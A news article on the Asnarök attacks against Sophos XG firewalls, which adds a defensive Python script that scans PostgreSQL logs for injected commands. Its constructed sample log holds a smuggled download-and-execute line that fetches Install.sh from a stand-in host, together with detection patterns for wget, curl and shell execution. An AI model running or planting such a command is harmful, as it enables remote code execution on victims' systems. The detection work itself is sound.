Hackers try many ways to attack Sophos firewalls

Sophos has published a second report about a recent series of attacks that tried to exploit a zero-day vulnerability in its XG firewall product. The attackers modified the attack in three ways.

by Seda Nur Cinar
May 22, 2020
in Cybersecurity

Sophos has published a second report about the Asnarök attacks on its firewalls. One month after the hotfixes rolled out, Sophos says the Asnarök attackers twice modified the attack midstream. Sophos and its customers were attacked by an unknown adversary between April 22 and April 26. The attack revealed a previously unknown SQL injection vulnerability that led to remote code execution on some of its firewall products.

Figure: First phase of the attack

The new phase of the attack

Sophos’ internal security teams published a report about this attack. After Sophos issued a hotfix, the attackers panicked and modified their attack routine, replacing their original data-stealing payload with ransomware deployed on corporate networks protected by Sophos firewalls. Firewalls that had received the hotfix blocked the subsequent attempts to install ransomware.

The attackers used the zero-day vulnerability to attack the firewall’s built-in PostgreSQL database server and plant malware on the device. The company named the attack Asnarök and started work on hotfixes. Four days after the attack had been discovered, Sophos released hotfixes for XG firewalls.

These hotfixes were pushed to all firewalls that had the auto-update option left enabled. The hotfixes closed off the SQL injection vulnerability to subsequent exploitation, but the company’s second report says that the Asnarök attackers twice modified the attack midstream. Sophos said that it has already taken additional steps that disrupted this phase of the attack.

Figure: Flow diagram of the second version of the attack

In the first phase of the attack, the attackers inserted a single line of Linux code into a database; the effect was that a shell script named Install.sh was downloaded to, and executed on, the firewall. The new phase of the attack has three components:

  • EternalBlue: Windows SMB exploits to allow attackers to infect computers on the internal network beyond the firewall.
  • DoublePulsar: Windows kernel implant to grant attackers a foothold on computers on the internal network.
  • Ragnarok: a crypto-ransomware strain, a less common threat than other ransomware.
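
The first phase described above rested on a single line of shell-style code stored in the firewall's database, which later caused Install.sh to be fetched and run. Below is an added example, not code from Sophos or from this article, showing the kind of check a defender can run over PostgreSQL statement logs to spot database writes that carry a download-and-execute command. The log lines, table names, host name (using the reserved .invalid domain) and the regular expressions are all constructed for this example; they are not Asnarök indicators, and the exact log format and patterns would need to be adapted to a real deployment.

```python
import re
from typing import Dict, List

# Constructed sample in PostgreSQL "statement:" log style. These lines are made
# up for this example and are not real Sophos or Asnarök artifacts. Line 3
# carries a shell download-and-execute string inside a SQL string literal,
# which is the shape of problem the article describes; line 4 mentions "curl"
# in ordinary text and must NOT be flagged.
SAMPLE_LOG = """\
2020-04-22 10:01:12 UTC LOG:  statement: SELECT name FROM tblservice WHERE id = 3
2020-04-22 10:01:15 UTC LOG:  statement: UPDATE tblsettings SET value = 'fw01' WHERE key = 'hostname'
2020-04-22 10:02:40 UTC LOG:  statement: UPDATE tblsettings SET value = '$(wget -O /tmp/Install.sh http://example.invalid/Install.sh; sh /tmp/Install.sh)' WHERE key = 'hostname'
2020-04-22 10:03:01 UTC LOG:  statement: INSERT INTO tblnotes VALUES ('reminder: curl the report tomorrow')
"""

# Assumed log layout: "<date> <time> <tz> LOG:  statement: <sql>".
LINE_RE = re.compile(r"^(?P<ts>\S+ \S+ \S+) LOG:\s+statement:\s+(?P<stmt>.*)$")

# A download tool name on its own is weak evidence (it may be ordinary text),
# so the high-severity verdict requires it together with an execution pattern.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|fetch)\b")
EXEC_RE = re.compile(r"(\|\s*(sh|bash)\b|\b(sh|bash)\s+\S+|chmod\s+\+x)")
# Shell command substitution has no legitimate reason to appear in most
# configuration values, so it is reported on its own at medium severity.
SUBST_RE = re.compile(r"\$\(|`")


def classify_statement(stmt: str) -> str:
    """Return 'high', 'medium' or 'none' for one logged SQL statement."""
    has_download = bool(DOWNLOAD_RE.search(stmt))
    has_exec = bool(EXEC_RE.search(stmt))
    has_subst = bool(SUBST_RE.search(stmt))
    if has_download and has_exec:
        return "high"
    if has_subst:
        return "medium"
    return "none"


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse statement-log lines and return the ones that look like
    download-and-execute payloads, with line number, timestamp and severity."""
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a statement line (or a format we do not parse)
        severity = classify_statement(m.group("stmt"))
        if severity == "none":
            continue
        findings.append(
            {
                "line": lineno,
                "timestamp": m.group("ts"),
                "severity": severity,
                "statement": m.group("stmt"),
            }
        )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} [{f['severity']}] {f['timestamp']}: {f['statement']}")
```

Run against the constructed sample, only the third line is reported (as high severity); the benign "curl the report" note is left alone because no execution pattern accompanies it. In practice this check belongs in a log pipeline that already forwards database statement logs off the appliance, so that a tampered device cannot quietly erase the evidence.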

Sophos recommends that customers with affected firewalls reset passwords and follow the remediation instructions in KBA135412. It is also important to keep machines inside the firewall perimeter up to date, since the second phase relies on a Windows SMB exploit to reach hosts behind the firewall.

Seda Nur Cinar is the news editor of the Cloud7 News. With more than 8 years of Linux and cloud experience, Seda is a Linux and opensource enthusiast, security researcher and a web application developer.